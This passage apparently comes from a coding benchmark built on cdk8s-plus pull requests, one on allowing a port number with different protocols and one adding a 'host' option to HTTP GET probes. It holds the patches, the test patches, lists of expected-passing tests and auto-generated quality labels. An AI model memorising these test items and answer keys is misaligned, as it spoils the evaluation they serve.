ports and the backend uses one of them", 
"fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to 
selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to 
docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can 
allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "custom configuration", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can mutate metadata" ]
Method: Container.addPort(port: ContainerPort) Location: src/container.ts (around line 820) Inputs: - **port** – an object describing the container port with the following fields: - `number` (number, required): the numeric port value. - `name` (string, optional): an identifier for the port. - `protocol` (Protocol enum, optional): the transport protocol (e.g., `Protocol.TCP` or `Protocol.UDP`). If omitted, defaults to `Protocol.TCP`. Outputs: - **void** – the method mutates the container by adding the supplied port. - **Error** – throws `Error` with message `Port with number <number> and protocol <protocol> already exists` when a port with the same *number* + *protocol* combination is already present in the container. Description: Adds a new port definition to the container while enforcing uniqueness of the (port number, protocol) pair. This enables configuring multiple ports that share the same numeric value but differ in protocol (e.g., TCP vs UDP). It is invoked directly in tests via `container.addPort({ number: 8080 })` and `container.addPort({ number: 8080, protocol: kplus.Protocol.UDP })`.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3508", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue aims to allow containers to expose the same numeric port with different protocols, but the issue description only contains backport metadata and lacks explicit acceptance criteria, making the intent only partially described. The provided test patch clearly specifies the expected behavior and error messages, and the tests are consistent with that behavior, showing no misalignment. 
The primary problem is the ambiguous specification in the issue text, which classifies this as a B4 (AMBIGUOUS_SPEC) case.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
d97429df6d4752cc10470c4504b66442030cf393
2024-04-07 09:03:13
cdk8s-team__cdk8s-plus-3989
diff --git a/src/container.ts b/src/container.ts index 3357c648..28048a6e 100644 --- a/src/container.ts +++ b/src/container.ts @@ -820,14 +820,15 @@ export class Container { public addPort(port: ContainerPort) { const names = this._ports.map(p => p.name).filter(x => x); - const numbers = this._ports.map(p => p.number); + const numberProtocols = this._ports.map(p => `${p.number}/${p.protocol || Protocol.TCP}`); if (port.name && names.includes(port.name)) { throw new Error(`Port with name ${port.name} already exists`); } - if (numbers.includes(port.number)) { - throw new Error(`Port with number ${port.number} already exists`); + const protocol = `${port.number}/${port.protocol || Protocol.TCP}`; + if (numberProtocols.includes(protocol)) { + throw new Error(`Port with number ${port.number} and protocol ${port.protocol || Protocol.TCP} already exists`); } this._ports.push(port);
fix(container): allow the same port number with different protocols (#3508) # Backport This will backport the following commits from `k8s-28/main` to `k8s-27/main`: - [fix(container): allow the same port number with different protocols (#3508)](https://github.com/cdk8s-team/cdk8s-plus/pull/3508) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Allow containers to expose the same port number when using different protocols **Problem** Container port validation incorrectly treated any reuse of a port number as a conflict, even when the protocols differed. This prevented legitimate configurations such as exposing TCP and UDP on the same port. **Root Cause** The uniqueness check considered only the numeric port value and ignored the associated protocol. **Fix / Expected Behavior** - Validate port uniqueness based on the combination of number **and** protocol. - Permit adding ports with identical numbers as long as their protocols differ. - Continue to reject ports that duplicate an existing name. - Continue to reject ports that duplicate both number and protocol. - Update error messages to reflect the combined number/protocol context. **Risk & Validation** - Ensure existing configurations that rely on the original validation still fail when truly duplicate. - Add or update tests to cover scenarios with same number/different protocol and duplicate protocol cases. - Verify that default protocol handling (TCP) remains consistent.
3,989
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index 331b6fd5..eccb9ba7 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -180,23 +180,56 @@ describe('EnvValue', () => { describe('Container', () => { - test('cannot configure identical ports at instantiation', () => { + test('cannot configure identical ports and protocols at instantiation', () => { expect(() => new kplus.Container({ image: 'image', ports: [ { number: 8080, + protocol: kplus.Protocol.TCP, }, { number: 8080, + protocol: kplus.Protocol.TCP, }, ], - })).toThrowError('Port with number 8080 already exists'); + })).toThrowError('Port with number 8080 and protocol TCP already exists'); }); - test('cannot add an already existing port number', () => { + test('can configure identical ports with different protocols at instantiation', () => { + const container = new kplus.Container({ + image: 'image', + ports: [ + { + number: 8080, + protocol: kplus.Protocol.TCP, + }, + { + number: 8080, + protocol: kplus.Protocol.UDP, + }, + ], + }); + + expect(container._toKube().ports).toEqual([{ + containerPort: 8080, + protocol: 'TCP', + }, { + containerPort: 8080, + protocol: 'UDP', + }]); + expect(container.ports).toEqual([{ + number: 8080, + protocol: kplus.Protocol.TCP, + }, { + number: 8080, + protocol: kplus.Protocol.UDP, + }]); + }); + + test('cannot add an already existing port number with identical protocol', () => { const container = new kplus.Container({ image: 'image', @@ -205,8 +238,38 @@ describe('Container', () => { }], }); - expect(() => container.addPort({ number: 8080 })).toThrowError('Port with number 8080 already exists'); + expect(() => container.addPort({ number: 8080 })).toThrowError('Port with number 8080 and protocol TCP already exists'); + + }); + + test('can add an already existing port number with a different protocol', () => { + + const container = new kplus.Container({ + image: 'image', + ports: [{ + number: 8080, + protocol: kplus.Protocol.TCP, + }], + }); + 
container.addPort({ + number: 8080, + protocol: kplus.Protocol.UDP, + }); + expect(container._toKube().ports).toEqual([{ + containerPort: 8080, + protocol: 'TCP', + }, { + containerPort: 8080, + protocol: 'UDP', + }]); + expect(container.ports).toEqual([{ + number: 8080, + protocol: kplus.Protocol.TCP, + }, { + number: 8080, + protocol: kplus.Protocol.UDP, + }]); }); test('cannot add an already existing port name', () => {
[ "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol" ]
[ "can grant permissions on imported", "role can bind to imported", "defaultChild", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can mutate metadata", "default configuration", "custom configuration", "Can be isolated", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "fromCommand", "fromHttpGet", "fromTcpSocket", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can 
create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "defaults", "custom", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific 
resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "can select namespaces", "can select all namespaces", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a 
RoleBinding after creating it", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be 
used to define probes", "Can add resource limits and requests", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected 
spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and 
maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing 
container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces 
selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Container.addPort(port: ContainerPort) Location: src/container.ts (class Container) Inputs: `port` – object with mandatory `number: number` and optional `protocol?: Protocol` (defaults to `Protocol.TCP`). Outputs: `void`; throws `Error` with message “Port with number {number} and protocol {protocol} already exists” if a port with the same number **and** protocol is already present. Description: Adds a new port to the container while ensuring that the combination of port number and protocol is unique. Function: new kplus.Container(props: ContainerProps) Location: src/container.ts (class Container constructor) Inputs: `props` – object containing at least `image: string` and optional `ports?: ContainerPort[]`; each `ContainerPort` has `number: number` and optional `protocol?: Protocol`. Outputs: `Container` instance; throws `Error` with message “Port with number {number} and protocol {protocol} already exists” if the supplied `ports` array contains duplicate number‑protocol pairs. Description: Constructs a Container with the specified image and ports, validating that no two ports share both the same number and protocol. Method: Container._toKube() Location: src/container.ts (internal helper used in tests) Inputs: none. Outputs: object representing the Kubernetes container spec; its `ports` field is an array of `{ containerPort: number, protocol: string }` reflecting the container’s configured ports. Description: Serialises the Container into the low‑level Kubernetes manifest format, exposing the effective port list for verification in tests. Property: Container.ports (getter) Location: src/container.ts (class Container) Inputs: none. Outputs: `ContainerPort[]` – the list of ports as configured on the container, each entry containing `number` and `protocol` (defaulting to `Protocol.TCP` when omitted). Description: Returns the current set of ports defined for the container, preserving the number‑protocol pairing semantics.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.86, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3508", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug", "edge_case_bug" ], "reason": null, "reasoning": "The issue merely references a backport PR without describing the desired change, leaving the expected behavior (allowing same port number with different protocols and updated error messages) implicit. The test suite defines these expectations, but the issue text does not, making the specification ambiguous. This mismatch signals an ambiguous spec (B4) rather than a clearly solvable problem (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests assert specific error message strings that are not described in the issue text", "Tests expect new behavior (allowing same port number with different protocols) not explicitly stated" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, 
"test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ad442c7d4ed5dc6cde827d29ec9b350a22fdb665
2024-04-18 07:16:07
cdk8s-team__cdk8s-plus-4042
diff --git a/src/_action.ts b/src/_action.ts index a1c7bc6c..40bb8d88 100644 --- a/src/_action.ts +++ b/src/_action.ts @@ -21,11 +21,16 @@ export class Action { return { command }; } - public static fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme } = { }): k8s.HttpGetAction { + public static fromHttpGet(container: Container, path: string, options: { + port?: number; + scheme?: ConnectionScheme; + host?: string; + } = {}): k8s.HttpGetAction { return { path, port: k8s.IntOrString.fromNumber(options.port ?? container.portNumber ?? 80), scheme: options.scheme ?? ConnectionScheme.HTTP, + host: options.host, }; } -} \ No newline at end of file +} diff --git a/src/probe.ts b/src/probe.ts index e10fc8e8..048e619c 100644 --- a/src/probe.ts +++ b/src/probe.ts @@ -85,6 +85,13 @@ export interface HttpGetProbeOptions extends ProbeOptions { * @default ConnectionScheme.HTTP */ readonly scheme?: ConnectionScheme; + + /** + * The host name to connect to on the container. + * + * @default - defaults to the pod IP + */ + readonly host?: string; } /**
feat(probe): add `host` property to HttpGet probes (#3818) # Backport This will backport the following commits from `k8s-29/main` to `k8s-27/main`: - [feat(probe): add `host` property to HttpGet probes (#3818)](https://github.com/cdk8s-team/cdk8s-plus/pull/3818) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add optional `host` field to HTTP GET probes **Problem** HTTP GET probes currently lack a way to specify a target host, forcing them to always use the pod IP. This limits scenarios where probes need to reach a named service or external endpoint. **Root Cause** The probe configuration and underlying HTTP GET action definitions omit a `host` attribute, preventing its exposure to users. **Fix / Expected Behavior** - Extend probe options to include an optional `host` property. - Propagate the `host` value to the generated HTTP GET action in the manifest. - Preserve existing behavior when `host` is not supplied (defaults to pod IP). - Update documentation/comments to describe the new option and its default semantics. **Risk & Validation** - Verify that existing probes continue to render unchanged when `host` is omitted. - Add tests to confirm that specifying `host` results in the correct field in the rendered Kubernetes manifest. - Ensure backward compatibility with clusters that may ignore the `host` field.
4,042
cdk8s-team/cdk8s-plus
diff --git a/test/probe.test.ts b/test/probe.test.ts index 17946ea5..8040b027 100644 --- a/test/probe.test.ts +++ b/test/probe.test.ts @@ -57,6 +57,7 @@ describe('fromHttpGet()', () => { periodSeconds: Duration.seconds(5), successThreshold: 3, timeoutSeconds: Duration.minutes(2), + host: '1.1.1.1', }); // THEN @@ -65,6 +66,7 @@ describe('fromHttpGet()', () => { path: '/hello', port: k8s.IntOrString.fromNumber(5555), scheme: 'HTTP', + host: '1.1.1.1', }, failureThreshold: 11, initialDelaySeconds: 60,
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname" ]
